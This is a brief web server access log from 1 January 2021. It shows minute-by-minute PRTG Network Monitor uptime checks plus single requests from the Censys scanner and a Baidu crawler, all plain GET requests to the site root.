212.91.246.72 - - [01/Jan/2021:13:38:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:39:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:40:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:41:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:42:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:43:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:44:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:45:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:46:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:47:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:48:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
74.120.14.55 - - [01/Jan/2021:13:48:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "-"
74.120.14.55 - - [01/Jan/2021:13:48:36 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)"
212.91.246.72 - - [01/Jan/2021:13:49:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:50:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:51:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:52:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:53:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:54:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:55:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [01/Jan/2021:13:56:01 +0100] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
183.136.225.56 - - [01/Jan/2021:13:56:09 +0100] "GET / HTTP/1.1" 200 1229 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm);googlebot|baiduspider|baidu|spider|sogou|bingbot|bot|yahoo|soso|sosospider|360spider|youdaobot|jikeSpider;)"
